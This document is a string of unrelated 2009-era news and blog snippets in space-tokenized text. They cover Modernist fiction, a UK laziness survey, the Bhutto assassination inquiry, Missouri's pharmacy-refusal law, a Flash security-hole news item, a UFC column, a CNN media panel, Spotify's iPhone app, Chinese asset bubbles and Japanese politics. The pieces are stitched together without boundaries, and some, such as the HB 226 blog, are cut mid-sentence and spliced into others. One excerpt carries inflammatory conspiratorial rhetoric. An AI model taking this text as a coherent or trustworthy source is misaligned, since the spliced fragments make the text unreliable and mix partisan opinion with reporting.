The 20th century had a full century 's worth of masterpieces before it was half over .
But let 's look back for a second at where the Modernists came from , and what exactly they did with the novel .
They drew a tough hand , historically speaking .
All the bad news of the modern era had just arrived more or less at the same time : mass media , advertising , psychoanalysis , mechanized warfare .
The rise of electric light and internal combustion had turned their world into a noisy , reeking travesty of the gas - lit , horse - drawn world they grew up in .
The orderly , complacent , optimistic Victorian novel had nothing to say to them .
Worse than nothing : it felt like a lie .
The novel was a mirror the Modernists needed to break , the better to reflect their broken world .
So they did .
One of the things they broke was plot .
To the Modernists , stories were a distortion of real life .
In real life stories do n't tie up neatly .
Events do n't line up in a tidy sequence and mean the same things to everybody they happen to .
Ask a veteran of the Somme whether his tour of duty resembled the " Boy 's Own " war stories he grew up on .
The Modernists broke the clear straight lines of causality and perception and chronological sequence , to make them look more like life as it's actually lived .
They took in " The Mill on the Floss " and spat out " The Sound and the Fury . "
Britons are so lazy that one in six cannot be bothered to change television channel if the remote control is not working , according to a study Monday .
More than half said they would take the lift rather than climb two flights of stairs to their workplace , while three quarters had too little energy for sex at the end of a long day .
An entire generation risks being blighted by idleness , warned Nuffield Health , a non-profit organisation which commissioned the poll .
" Ready - meals , remote controls and even Internet shopping are all contributing to a dangerously lazy and idle Britain , " said Doctor Sarah Dauncey , its medical director .
" The nation has fallen into a vicious circle of laziness that we must put a stop to , " she added .
And she warned : " If we do n't start to take control of this problem , a whole generation will become too unfit to perform even the most rudimentary of tasks . "
In the poll of more than 2,000 adults , 15 percent said that , if the television remote was broken , they would rather continue watching the same channel than getting up and switching to another programme .
Thirty - six percent said they would not run to catch a bus , 59 percent took the lift instead of walking up even two flights of stairs , and 52 percent of dog owners said they could not be bothered to walk their pet .
Some 73 percent had no energy for sex , while 64 percent of parents were too tired to play with their children -- fuelling concern over child obesity , which already afflicts one in six pre-school infants .
" People need to get fitter , not just for their own sake , but for the sake of their families , friends and evidently their pets too , " said Dauncey .
( c ) 2009 AFP
Explore further Americans say global warming is a problem
Protest Against the Seizure of Palestine
June 11 , 2009
New York City New York City , 11 June , 2009 On Thursday , June 11 , 2009 , Anti-Zionist Orthodox Rabbis stood in solidarity with other pro Palestinian people , in front of the United Nations headquarters in New York City , to protest Israel 's seizure , 42 years ago , of the West Bank and Gaza .
View a video of this event to listen to speech explaining why Torah True Jews stand in solidarity with the Palestinians on this issue .
Benazir Bhutto was assassinated leaving a party rally in December 2007 A United Nations inquiry into the assassination of former Pakistani PM Benazir Bhutto has formally began .
It is headed by Chile 's ambassador to the UN , Heraldo Munoz , and includes a former Indonesian attorney general and a former senior Irish police officer .
The inquiry will last six months and investigate the " facts and circumstances " of Ms Bhutto 's death .
She was killed in December 2007 as she left a rally of her Pakistan People 's Party ( PPP ) supporters in Rawalpindi .
The three - member inquiry team will arrive in Pakistan later this month and submit its report to the UN Secretary General in six months , reports say .
Apart from Mr Munoz , the other members of the probe team are Marzuki Darusman , the former Indonesian attorney - general , and Peter Fitzgerald , who headed an early inquiry into the assassination of former Lebanese prime minister Rafik Hariri .
Pakistan 's Interior Minister , Rehman Malik , told the BBC his government thought the UN investigation was necessary to find out who was behind the attack .
We think this was a big international conspiracy
Rehman Malik , Pakistan interior minister " We want to know who was behind this , who had conspired it , who has financed it .
And we think this was a big international conspiracy , " he said .
" Obviously , there might be some actors within Pakistan or within the region , but we want really to expose the whole conspiracy , because we think that this was a kind of a beginning of an attempt to Balkanise Pakistan . "
These are challenging times in Pakistan to carry out such an investigation , says the BBC's World Affairs correspondent Mike Wooldridge in Islamabad .
That is not least because the Pakistan Taliban leader Baitullah Mehsud , accused by the last government here of being behind the assassination , is the target of a two - month military offensive and his militant network has hit back with retaliatory suicide attacks .
The Taliban commander has denied having anything to do with Ms Bhutto 's killing .
' Rogue elements '
Her assassination left questions unresolved for many people here , but especially her own party , which is now in government .
British detectives conclude a lone attacker fired the shots
After she had narrowly escaped a double suicide bombing on the day of her return to Pakistan from self - imposed exile in October 2007 , she accused what she called " enemies " and " rogue elements " in the government led by President Pervez Musharraf and in the intelligence agencies of plotting to kill her .
The UN inquiry cannot itself launch criminal proceedings , but can apparently apportion blame if it chooses to do so .
Officials say the inquiry will work " fairly discreetly " .
Former Pakistani President Pervez Musharraf had blamed an al - Qaeda - linked militant for the attack and refused to seek a UN investigation .
He invited police from London 's Scotland Yard to assist in the inquiry into her death .
FROM BBC WORLD SERVICE Please turn on JavaScript .
Media requires JavaScript to play .
More from BBC World Service
In their report , the British detectives said they believed she died due to a severe head injury sustained as a consequence of a bomb blast .
The Pakistani investigation into her death concluded that a lone attacker fired shots at Ms Bhutto before detonating explosives , but said that bullets were not the cause of death .
Wider enquiry Ms Bhutto's Pakistan People 's Party ( PPP ) rejected both these versions , claiming adequate security had not been provided for Ms Bhutto , and called for a wider inquiry by the UN to establish the identity and motives of the assassins .
A PPP - led coalition defeated Mr Musharraf 's allies in general elections last year .
Ms Bhutto , twice prime minister of Pakistan , lived in self - imposed exile after Mr Musharraf assumed power in 1999 .
Mr Musharraf had refused to seek an UN probe
In October 2007 , she returned to Pakistan to campaign for the PPP in parliamentary and provincial elections - the first to be held since President Musharraf resigned as head of the army and became a civilian leader .
Shortly after her return , she survived bomb attacks on her convoy in Karachi that killed more than 100 people .
But Ms Bhutto continued to campaign and was assassinated on 27 December at a PPP rally in Rawalpindi .
She was standing upright in her armoured vehicle , with her head exposed above the open roof escape hatch , waving to the crowd when an attacker opened fire .
Seconds later , a bomb was set off at the scene which left some 20 other people dead .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
This law
No licensed pharmacy in this state shall be required to perform , assist , recommend , refer to , or participate in any act or service ...
stealing
... in connection with any drug or device that is an abortifacient , including but not limited to the RU486 drug and emergency contraception such as the Plan B drug ...
... not limited to the RU486 drug ...
device that is an abortifacient
338.575 .
1 . No licensed pharmacy in this state shall be required to perform , assist , recommend , refer to , or participate in any act or service in connection with any drug or device that is an abortifacient , including but not limited to the RU486 drug and emergency contraception such as the Plan B drug .
2 . No civil or criminal cause of action shall accrue against a pharmacy due to a refusal to perform , assist , recommend , refer for , or participate in any act or service in accordance with subsection 1 of this section .
3 . No board , commission , or other agency or instrumentality of this state shall deny , revoke , suspend , or otherwise discipline the license of a pharmacy , nor shall it impose any other condition of operation due to a refusal to perform , assist , recommend , refer for , or participate in any act or service in accordance with subsection 1 of this section .
4 . No pharmacy shall be denied or discriminated against in eligibility for or the receipt of any public benefit , assistance , or privilege of any kind due to a refusal to perform , assist , recommend , refer for , or participate in any act or service in accordance with subsection 1 of this section .
Missouri politicians just passed a law that strikes a serious blow to Communism on American soil .
The Missouri House on Tuesday voted 115 - 43 to approve HB 226 , an amendment that By definition , when it comes to women of reproductive age , refusing to provide professional services to patients you deem undesirable is an inalienable right .
As such , there 's nothing special about politicians enacting laws to shield medical professionals from liability .
These politicians are just doing [ insert deity of choice ] 's work .
( Hear that malpractice lawyers ! )
What is remarkable about Missouri 's HB 226 is that it represents a quantum leap forward from the noble pursuit of playing games with your untouchable patients ' trust , dignity , and health without any professional or legal liability .
HB 226 allows pharmacies and pharmacists to take advantage of all the benefits of having a monopoly on the sale of drugs without any requirements to abide by those pesky professional duties and standards that are usually a condition of being granted a State monopoly .
Like so :
No duty to dispense drugs , talk to or advise patients , refer them to another pharmacist , or refrain fromtaking a patient 's prescription and refusing to return it to her .
No requirement to adhere to the professional standard of using science when dispensing drugs .
( The medical definition of abortifacient is out , the personal definition is in . )
No duty to dispense drugs to * pregnant * patients , since most prescription medications are Category C .
( Good luck with that asthma attack if you 're a pregnant woman in Missouri ! )
No requirement to stock or dispense a drug , RU - 486 , that cannot be legally stocked by pharmacies or dispensed by pharmacists to begin with .
No duty to provide pain meds or antibiotics to a patient who 's been administered misoprostol and RU - 486 by her physician , or , for that matter , to a patient who has an IUD , is already using birth control pills , or to men who are wearing tight underwear .
( Hey , when you legislate science out of medicine , defining man panties as ais perfectly valid . )
You tell me , what is more anti-communist than having the State grant a monopoly to an enterprise , remove duty and standard requirements , and then shield the entity from liability ?
Here is the full text oh HB 226 ; read it and weep :
One last thing .
I have a question for Rep. Ed Emery Rep. Cynthia Davis , and all the other Missouri politicians who passed HB 226 .
Since you 've removed the professional duty and standard requirements for the sale of drugs , can I haz street stand for the glorious , Capitalist selling of Plan B in your state ?
Labels : Cult Pharmacists , Misoprostol , Missouri , Plan B , Rep. Cynthia Davis , Rep. Ed Emery , RU - 486
In an interview , Mr. Brauchli said he had intended to go to the dinner and knew the company was seeking paying sponsors .
But he said he did not see the promotional flier , or know that the event might have a single sponsor .
Invitations to the event stated it was “ underwritten by Kaiser Permanente . ”
Sybil Wartenberg , a Kaiser spokeswoman , said that despite what was written on the invitation , “ we were in discussions about the event , but there was no final agreement for us to participate . ”
Mr. Brauchli said that in talking to The Post ’s marketing arm , “ we have always been explicit that there are certain parameters that are elemental for newsroom participation ” in special events .
Among those , he said , “ we do not limit our questions , and we reserve the right to allow any ideas that emerge in an event to shape or inform our coverage . ”
A few officials at the Department of Health and Human Services had been invited to the gathering , but no senior White House officials , administration aides said .
Robert Gibbs , the White House press secretary , said during his daily press briefing , “ I do not believe , based on what I ’ve been able to check , that anybody has accepted the invitations . ”
In midafternoon , Ms. Weymouth sent a memo to employees , saying : “ A flier went out that was prepared by the marketing department and was never vetted by me or by the newsroom .
Had it been , the flier would have been immediately killed , because it completely misrepresented what we were trying to do . ”
She added that other salon dinners would not involve the newsroom .
The Post recently hired a marketing executive , Charles Pelton , to begin organizing conferences , and executives said the flier came from his group .
He did not return calls seeking comment .
The Post ’s ombudsman , Mr. Alexander , in his blog , quoted Mr. Pelton as saying that the nature of the events had been “ well developed with the newsroom , ” but that “ what was not developed was the marketing message to potential sponsors . ”
PHOENIX -- The Arizona Diamondbacks and Colorado Rockies are NL West rivals .
Now they 're partners in a spring training facility planned for the Salt River Pima - Maricopa Indian Community near Phoenix .
Under an agreement announced Thursday , the tribe will build an 11,000 - seat ballpark and a complex that includes 12 practice fields , training facilities and offices .
The facility is expected to be ready for the 2011 exhibition season .
The 140 - acre site is adjacent to Scottsdale .
It is believed to be the first major league spring training facility on tribal land .
" We are certainly excited that we have come to an agreement on our future spring training home with a wonderful community , " Diamondbacks president and CEO Derrick Hall said .
" We have had several interested parties and sites but ultimately found this site to be superb . "
The Diamondbacks have held spring training operations at Tucson Electric Park since the team 's inception in 1998 , sharing the facility with the Chicago White Sox until 2008 .
The White Sox moved into a new facility with the Los Angeles Dodgers near the Phoenix - Glendale border last year , leaving only the Diamondbacks and Rockies in Tucson .
With most Cactus League teams in the Phoenix area , the Diamondbacks and Rockies said it was inconvenient to travel to road games .
The Diamondbacks also wanted to be closer to their fan base .
The Rockies trained at Tucson 's aging Hi Corbett Field since their inception in 1993 .
" We know that this shared home will be one of the finest year - round training facilities in all of Major League Baseball and something that our organizations , fans and the community will be proud of for decades to come , " Rockies president Keli McGregor said .
The deal announced Thursday is for 25 years with options to extend the term .
The tribe and the clubs said they would make joint decisions on the design of the facility near Indian Bend Road and the Loop 101 freeway , a short distance from a casino operated by the tribe and an adjacent large hotel that is under construction .
HKS Architects , which recently designed the Camelback Ranch - Glendale facility for the Dodgers and White Sox , is designing the new facility .
" Our ancestors built ball courts on this land and throughout the valley , " said Diane Enos , president of the Salt River Pima - Maricopa Indian Community .
" Now we are excited about bringing baseball home to our community . "
'' In my view , it is unfair to the victim 's families that this has not been heard .
It would help them to know the truth .
The truth never dies .
If the UK guaranteed it , I would be very supportive . ''
The GOP 's boss falsely claims the House version of the health care reform bill contains mandatory euthanasia :
:::
Deather , defined
Main entry : deather
Function : noun
Etymology : From birther , a related conspiracy theory which holds that President Obama is not a natural born U.S. citizen .
Inspired by the teabaggers of April 15 , 2009 .
Date : Mid-2009
Definition :
One who believes or spreads the false conspiracy theory that the health care reform legislation before Congress would create " death panels " or force seniors and sick people into euthanasia .
Examples : Sarah Palin is a deather .
Glenn Beck is a deather .
Rush Limbaugh is a deather .
WASHINGTON ( Reuters )
Even though he is 15th in the line of succession to the U.S. presidency , Energy Secretary Steven Chu still thinks he 's a nerd .
And some in Washington would n't argue with his assessment .
While many of President Barack Obama 's cabinet secretaries zoom around the nation 's capital in black sedans , Chu will occasionally pull into Energy Department headquarters on his bike , with his security detail peddling close behind .
In his commencement address at Harvard University on Thursday , the Nobel Prize - winning scientist admitted he may not be as exciting as previous speakers like Microsoft founder Bill Gates and " Harry Potter " author J.K. Rowling .
" Today , you have me .
I am not a billionaire , but at least I am a nerd , " Chu said at the beginning of his speech .
Chu went on to talk about the threat of climate change and ended his talk with a line that could have been conjured up by an obsessed adult " Star Trek " fan .
" May you prosper and help save our planet , " Chu said .
While not the exact works so often spoken by Mr. Spock , it was close enough .
( Reporting by Tom Doggett ; Editing by Christian Wiessner )
People are trying to enjoy Fat Princess , but the game 's shonky online setup is making that hard .
In an attempt to fix this , then , Sony will tonight be releasing a patch for the game .
Advertisement
It 'll go live tonight in the US , with patches for other regions to follow " as soon as possible " .
Along with ( hopefully ) an improvement in online performance comes a range of tweaks to the classes and point balances .
So , yeah , jump on later tonight , try it out , see if it helps any !
Fat Princess : Multiplayer Connections Improved [ Sony ]
I rooted .
The crowd rooted .
I cheered .
It cheered .
This was Ultimate Fighting Championship 102 at the Rose Garden and we were like a couple of regular Saturday night soulmates , were n't we ?
Right up until I figured out we were n't .
More on that in a bit .
First , understand , UFC is violent .
Bones were broken on Saturday .
Brains were boxed .
Three fighters lost consciousness --- the first two clubbed silly with fists , the other 's brain deprived of oxygen with a chokehold until his eyes rolled back in his head and he passed out .
One of the fighters on the undercard , Chris Tuchscherer , a heavyweight with a blonde - spiked haircut , was kicked in the family jewels so hard that he spit blood .
And then after a five - minute recovery period , and some urging to get the fight going from a member of the Oregon State Athletic Commission , the bout continued and the fighter 's face was so badly beaten and bloodied his hair turned light pink .
It got so bad that one of the UFC pay - per - view broadcast cameramen outside the fence , flinched and wiped his face after his cheek was with spattered with blood .
Most of crowd loved most of what it saw on Saturday .
They must have .
Because they stood , and roared , and jumped around and celebrated with back slaps when the knockouts were replayed on one of six jumbo video monitors in the arena .
And that 's not to say those who loved the show were cavemen .
But if we 're conducting a sociological study here , the basis for the study could revolve around the level of tolerance each of us has for violence .
No crime there , right ?
I hated the Tuchscherer fight because I do n't like seeing humans run over by dump trucks .
I followed the guy toward the locker room after the fight , and as he disappeared I saw his wobbling legs , and the confusion as he turned the wrong way in the arena halls .
A fan in the arena , leaned over to me as I walked back , saw me cringing , and said , " Do n't judge the sport on that fight .
I did n't like seeing that one either . "
It 's true , is n't it ?
We judge a sport by its worst moments .
Its lowest form is what it is .
We talk about the concussions in football , and the drugs in baseball .
And in the end , I figure UFC has come a long way since its inception , but still has work to do .
Because when we talk about the worst of UFC , we have to talk about its crude nature .
Someone is going to die in the Octagon someday .
We 're headed straight there , and anyone who saw the damaging blows to the brains on Saturday , including UFC head Dana White , can't ever say they did n't see it coming .
I 'd say that the state athletic commission needs to stop worrying about entertainment dollars and start putting the safety of the fighter first .
And that the UFC referees need to be quicker to stop fights .
And that the gloves of the fighters should have more padding .
But I also think doing any of these things would hurt its popularity with the people who paid to watch on television or bought tickets to be inside the Rose Garden .
Because it turns out most of those in the crowd were rooting for big knockouts and devastating kicks .
And as hard as I tried to pull for one fighter or another to win , I always found myself secretly pulling for the fight to be settled by a decision and for everyone to walk away with his marbles intact .
I rooted for brain cells .
And for bones to stay whole .
And the best moments for me came when I saw two skilled fighters , each too talented to get knocked out by the other , working against each other .
And also , I was surprised by the humility in the competitors , especially in the back hallways , away from the crowds , where some of them popped their heads into the opponent 's dressing room to make sure nobody got seriously injured .
I gave this sport a chance .
And I 'll continue to watch it , mostly just to see if it can continue to evolve .
But I do n't yet understand what it is about the awful violence that sends some witnesses into a merry frenzy .
I left feeling conflicted and sick .
And thinking a lot about humankind .
These guys train hard , sure .
And they sacrifice .
And there 's redeeming value in giving all of yourself in pursuit of reaching a goal .
That 's undeniable evidence that there 's something buried in this sport that speaks to all of us .
Todd Duffee , a heavyweight who set an Octagon record by knocking out Tim Hague in 7 seconds with a single punch , said : " With what I 'll make tonight , I 'll break even .
I had to take out a student loan to pay for my travel costs . "
A few minutes later , on the 100 - level concourse at the Rose Garden , Hague was spotted walking along in a daze all by himself .
These guys became human .
I like the fighters .
I just do n't like the fights .
-- John Canzano ; JohnCanzano@aol.com .
Catch him on the radio on " The Bald - Faced Truth , " 3 - 6 p.m. weekdays on KXTG ( 95.5 ) .
Howard Kurtz admits that the media " has fun " covering the pissed off Republicans at the town hall protests .
Hey Howard , I did n't think having fun was supposed to be something the media considered when deciding what " news " stories to cover .
And no , the coverage has not been fair .
There 's been very little coverage of these Remote Area Medical events with people lined up for miles and hours on end to get treatments they can't afford .
KURTZ : Jeff Zeleny , is Robert Gibbs right and Obama right that the media are providing a distorted picture of these town halls by focusing on the most confrontational moments ?
ZELENY : Well , I think in a sense they are , but in a sense they 're not .
First , I think , I mean , the images and the passions that were shown this week from town hall meetings show real Americans having real concerns about this .
I think that 's one of the things that has been left out of this .
I spent most of the week in Iowa going to several town halls .
There are real , patriotic voting Americans , some who voted for President Obama , who do n't like what they see shaping up as a plan .
But ...
KURTZ : But is that the whole story ?
ZELENY : But it 's not the whole story .
And I think we have been missing the context of all this
YouTube is fantastic .
It takes us everywhere , into town meetings that we could n't go , but it does n't give us any context .
And that has been a problem this week .
KURTZ : And when I watch cable , Amy Holmes , it almost seem like this endless loop of these loud moments .
I mean , there 's one woman in a blue dress , Katy Abram , we 're going to play later .
I 've seen her 50 times .
HOLMES : Indeed .
And it 's perfect for television .
You 've got the audio , you 've got the visuals , you 've got the heat and the passion .
But there are some loops that have not been played endlessly .
Kenneth Gladney , an African - American gentleman who was at one of these town halls , was beaten up .
And yet , he has not been splashed on the front pages .
He has gotten less attention than Professor Gates and his arrest at Harvard .
So , I think if you look at conservatives , the context that they are concerned about is the context that this is supposed to marginalize and characterize the entire opposition to health care plan as being fringe and hysterical .
And the same treatment is not given to the other side when their folks come out to protest .
KURTZ : And Ruth Marcus , Obama keeps repeating this line about how TV loves a ruckus .
And here we just heard Gibbs say the media was disappointed that no one yelled at the president after his first town hall meeting in New Hampshire .
Is there a grain of truth there ?
MARCUS : Sure .
Look , conflict is more interesting than lack of conflict .
When flowers bloom and the sun is shining , it 's not necessarily news .
And so , we are all going to naturally gravitate to -- we , being the media -- naturally gravitate to the more exciting moments .
And it is more exciting if you 're a journalist to have those exciting moments .
And I think it 's a little naive and a sign of some -- to some extent their -- the way they have been rocked back on their heels to hear the White House complaining about , you know , following the ruckus .
They know that .
KURTZ : Right .
HOLMES : This White House complaining about media coverage after Obama being on the cover of " TIME " magazine how many times ?
KURTZ : It 's really striking though how often Robert Gibbs and the president have complained about the media coverage .
And here 's a funny note .
When Fox News was breaking away from that first Obama town hall , the anchor , Trace Gallagher , said , " Any contentious questions , anybody yelling , we 'll bring it to you . "
In other words , that would cause them to go back .
Now , Jeff Zeleny , the other night , the " CBS Evening News " led off with a story about 1,500 people lined up in L.A. for a clinic that was providing free health care for a couple days .
And it made me think , well , the reason the existing health care system -- we 've all kind of gotten away from covering it -- I think news organizations have made an honest effort to try to unravel the complexities of this health care issue .
But , let 's face it , covering angry , shouting folks is a lot more fun .
ZELENY : No question about that .
And that free clinic I think was one example of that .
I think we had it on the cover of our paper as well , this week .
But I think if you look at the coverage , what I was struck by , talking to voters and seeing people this week , how well - informed people really were about this .
Not necessarily -- all the information was not accurate .
MARCUS : They knew about the death panels ?
ZELENY : Well , some , I think -- I think that was another thing that was taken a little bit -- perhaps given more attention than people actually thought .
But without question , I think a lot of news organizations are devoting a lot of time to serious coverage of this .
But it 's a complicated issue .
It 's impossible to break it down in a long newspaper story , let alone a 60 - second TV story .
Greg Evensen
NewsWithViews
July 30 , 2009
[ efoods ]
When police investigators begin amassing evidence at a crime scene , the bits and pieces of the puzzle begin to take shape .
Usually , with several trained men and women working together to come up with an answer , the intent and actions of the perpetrator are almost always revealed .
Since my core training and experience over many years was as a state level enforcement officer , I have worked crime scenes that were large , complex and conflicting .
With enough time , effort and resolve , we too , were able to bring the bad guys to account .
You certainly do not have to be a trained state trooper — or any other level police agent — to use common sense , logic and knowledge , to assess the crime scene that has become the socialist states of amerika .
I continue to be at a loss to explain how it is that so many tens of millions of amerikans simply do not see the utter destruction of their former republic by socialists , one worlders , deviates , liars and thieves .
The men in black have been roving the country flashing their memory erasers around the clock .
Let ’s take a check on how things are really going .
Read entire article
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
Adobe has vowed to fix a critical security hole in its Flash software within a week .
But the Department of Homeland Security ( DoHS ) has taken the extremely unusual step of advising users to switch off the feature until the patch is available .
The hole can be used for so - called ' drive by ' attacks occurring when a user simply visits an infected website .
However , the relevant code is also shared with Adobe 's Acrobat software , meaning it can cause security problems through PDF documents which have Flash embedded in them for greater interactivity .
That technique had already been criticized as a security risk .
The problem can theoretically affect Windows , Linux and Mac computers .
To date , it 's only confirmed that hackers have exploited it on Windows machines running Adobe Reader 9 .
Critical Fix Due July 30th
Adobe says it expects to have a fix for Flash Player 9 by next Thursday ( July 30th ) and for Adobe Reader and Acrobat the following day .
In the meantime , Adobe advises users to exercise caution visiting websites they may not be able to trust , to make sure antivirus software is up to date , and to consider using User Account Control mode if running Windows Vista .
The firm also suggests users block access to the file named authplay.dll that ships with either Adobe Reader or Acrobat .
The easiest way to find this file is to use Windows Search ( Start -> Search ) , type in the filename and search for it .
Once the file is found , rename it to authplay - old.dll ( for example ) , then rename it back to the original filename once the fix has been released .
While the file is renamed , users will get an error message and possibly a crash when opening a PDF document with Flash embedded , but the risk of infection will be negated .
( Source : adobe.com )
Government Calls For Stronger Action
That advice does n't go far enough for the Department of Homeland Security .
Its Computer Emergency Readiness Team ( CERT ) advises users to " Disable Flash Player or selectively enable Flash content " until the patch is released .
( Source : us- cert.gov )
That would certainly do the trick , though it would mean many web features , including videos on YouTube , would become inaccessible .
Depending on the browser / operating combination , users may be able to stop their computers running Flash content by default , while simply clicking to access any content they trust .
MeMikeGrow said :
I definitely will try this my next session .
Do n't know why I 've never tried this myself .
Maybe it sounds a little scary -- you face the edge of reality and your ego will scream in pain .
Actually , there is a form of meditation where monks go into a dark cave for weeks .
After a few days they start tripping and seeing visuals ... w/ out drugs .
Ever hear of sensory deprivation chambers ?
It 's a coffin like structure that 's half filled with lukewarm salt water .
It 's sound proof and you float in total darkness .
On youtube you can find a clip of Joe Rogan talking about a time he went into one of these after smoking DMT .
Something I wanna try too .
Click to expand ...
Last week , we told you Spotify is set to take America by storm , and the streaming music service could soon do the same to the iPhone platform – but only if Apple approves Spotify 's iPhone app , which shows real potential to threaten iTunes on Apple 's own iPhone platform .
We 've been testing Spotify 's iPhone app since last week for this U.S. exclusive .
Based on that , our prediction that it could generate big profits for Spotify – and for an ailing music industry – appears to be on the money .
This slick app grants instant access to over six million on - demand tracks and your customized Spotify playlists , and it sounds great even on planes , subways , and other places where you can't get a decent cell signal thanks to an offline playback feature .
Spotify is currently only available in Europe but the company plans to roll out in America by the end of the year .
To do so , it must first sign deals with copyright holders , but founder Daniel Eks said he " feels very comfortable [ about that ] , in that the labels want to see Spotify in the U.S. "
Other than the labels , the only roadblock between you and this iPhone app is Apple .
" It 's going to be very interesting to see if Apple lets this through or sees us as competition – fingers crossed , " explained Spotify communications manager Jim Butcher .
It certainly wo n't help that unlike some other apps , Spotify 's does not include " buy " links to the iTunes music store .
However , Apple would take a percentage of Spotify 's iPhone - related revenue , and might not care what people use to listen to music , so long as it runs on Apple hardware .
If Apple approves the app in the next few weeks , it will require a paid Spotify account , and will only be available where the desktop version is available .
Butcher said pricing for the iPhone app and / or the Spotify premium service ( higher bit rate , no ads ) has yet to be worked out for the U.S. rollout .
Whether Apple approves this app for widespread use or not , I have it installed and you 'd have to pry it out of my cold , dead iPhone before I 'll delete it from my phone .
In the same way that the Spotify on a desktop feels like iTunes with more than 6 million songs , Spotify on an iPhone feels like an iPod with the same ridiculously comprehensive library .
Like the desktop application , the iPhone version of Spotify lets you create and listen to custom playlists from the music catalog for free ( ads ) or for a monthly fee , listen to songs and albums on demand , and play and edit other people 's playlists , so long as you have the corresponding URL .
Spotify 's success as an iPhone app hinges partially on a crucial feature : the ability to cache entire playlists for listening when you 're connected to AT&T 's slow Edge network ( on which we encountered dropouts , as we have with other music streaming apps ) – or for when there 's no connection at all .
That means if your iPhone or iPod Touch has enough room , you can store up to 3,333 songs in Spotify playlists on the iPhone .
That 's 10 days of listening , all without streaming a single song over an internet connection .
Even better , playlists sync easily over Wi -Fi – no USB cable required .
Everything starts here , in the Playlists screen .
You can shuffle any playlist , or play it in order .
Note the all - important " offline playlists " button :
When you 're connected via Wi - Fi , songs play one immediately after the other .
Expect a little bit of lag between songs on 3 - G , and to hear dropouts if you 're on the Edge network ( first - generation iPhone owners should be prepared to sync playlists for offline listening ) .
Here 's the Now Playing screen , which displays album art :
Touching the album cover or " info " button brings up the following screen , where you can click over to the entire album or add the track to a playlists .
These changes sync almost instantaneously to the desktop install of Spotify ( and changes made on the desktop sync to the iPhone :
When it 's time to find something new , you can search by track or album title :
And here 's the feature that could convince Spotify users to stop syncing their iPods from iTunes : the offline playlist feature .
Here , I 'm syncing someone else 's " Reggae from Germany " playlist onto my iPhone 's memory , via Wi-Fi :
See Also :
It ’s odd that I was watching the Steelers game with my bud HMJ this past weekend , and then I happened to stumble on these pictures .
I think most would agree that these Steelers “ tobacco ” pipes are pretty cool - looking .
This place here just put the pipe above online .
Pre-Super Bowl XLIII Santonio Holmes just got way excited .
And elsewhere , Michael Beasley is just using rehab and an apparent mental breakdown as an excuse to switch sports .
Here ’s another gaudy - er one that is currently sold out .
Someone else was all up on this fad before us .
Over the past few decades , the U.S. market has become a symbol of irrational expectations and unsustainable returns .
From the tech bubble in the late 90s to the real estate bubble we 're still cleaning up , foreign investors have become warier of putting their money to work in the U.S.
One of the countries hoping to pick up some of those global investments is up - and - coming world superpower China .
But according to some of their own economists , China might be making the same kind of mistakes we did .
The Associated Press reports through BusinessWeek :
China risks frittering away its stimulus spending on speculation in stocks and real estate , reports said Monday , citing economists who say surging bank loans risk inflating risky asset bubbles .
I guess Matt Taibbi must have a theory for this involving Goldman Sachs , but it sounds to me like Chinese investors have the same irrational exuberance that once gripped U.S. markets .
No one likes to stand in the way of a runaway train .
On some level , China 's situation could end up being worse than ours : generally our investors bet on bubbles with their own money .
In China , that money is coming from government stimulus and loans .
According to AP :
While recent gains in shares and property prices are a welcome respite for investors , putting funds meant for stimulus projects into speculative investments could undermine the government 's effort to boost growth and reduce the economy 's heavy reliance on exports .
About 20 percent of bank lending is going into stock speculation , and another 30 percent or so is going into the property market , state - run newspapers cited Wei Jianing , an economist with a Cabinet - level think tank , as saying .
Much like we saw here , China 's banks are also lending entirely too much .
Year - to - date , Chinese banks have loaned the equivalent of over a trillion U.S. dollars -- more than the annual lending for any entire year in China 's history .
Yet , China is a controlled economy -- why does n't their government stop the madness ?
Well , it 's trying .
The state - controlled media is attempting to warn investors and consumers to stop taking so much risk .
It is n't working .
My guess is that , eventually , the Chinese government will step in and use some brute force , instead of mere propaganda , to stop this speculative investing .
Until then , however , foreign investors should tread carefully in the Chinese market .
This could bode well for the U.S. , where banks have a newfound conservative attitude towards lending , and many believe stock prices are still a bargain .
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
When I reviewed Jon Cohn ’s Sick a couple of years ago for CJR , I concluded with this :
The format of Sick almost begs for narratives about overseas health care systems .
The book is basically a tour around America , with each of its eight chapters named after the place in which its story unfolds .
So why not include chapters on Manchester , Malmö , and Marseilles , each of them highlighting in narrative form both the good and bad points of the British , Swedish , and French systems ?
Naturally , then , I ’m delighted that Jon found someone to fund exactly that :
Last year , I had the opportunity to spend time researching two [ ] countries : France and the Netherlands .
Neither country gets the attention that Canada and England do .
That might be because English is n’t their language .
Or it might be because they do n’t fit the negative stereotypes of life in countries where government is more directly involved in medical care .
….
In the course of a few dozen lengthy interviews , not once did I encounter an interview subject who wanted to trade places with an American .
And it was easy enough to see why .
People in these countries were getting precisely what most Americans say they want :
Timely , quality care .
Physicians felt free to practice medicine the way they wanted ; companies got to concentrate on their lines of business , rather than develop expertise in managing health benefits .
But , in contrast with the US , everybody had insurance .
The papers were n’t filled with stories of people going bankrupt or skipping medical care because they could n’t afford to pay their bills .
And they did all this while paying substantially less , overall , than we do .
Forget Canada and Britain .
Neither one is even remotely close to the kind of system we ’d ever put in place in the U.S. France ’s system , however , is surprisingly American in its basic underpinnings .
And while no system comes out tops in every single metric , French healthcare , as Jon says , is better than ours on almost all of them and does it for close to half the cost .
Now , the fact that the French spend about half what we do does n’t mean that we ’d cut our costs in half if we adopted a French - style system .
We would n’t .
There ’s too much path dependence and too many cultural differences for that .
But what it does mean is that if we adopted something close to their system , we could certainly achieve high - quality 100 % basic coverage — with the ability to purchase extra coverage for anyone who wants it — for no more than we spend now and possibly a bit less .
We wo n’t , of course , because too many people are still convinced that healthcare in the United States is better than it is in France — or anywhere else .
It ’s not .
It ’s worse and more expensive .
Somebody tell Max Baucus .
UPDATE : Matt Yglesias says that Max already knows .
I figured as much .
Illustration by M. Morgenstern
HIS distraught colleagues cannot forgive Taro Aso for calling a general election on August 30th , following a dismal stint as prime minister .
They accuse him of setting up the opposition Democratic Party of Japan ( DPJ ) for a landslide victory , so bringing the long rule of the Liberal Democratic Party ( LDP ) to an abrupt and ignominious end .
Yet the question is not why the LDP 's rule looks about to end soon .
Rather it is how on earth the party managed to cling on to power for so long .
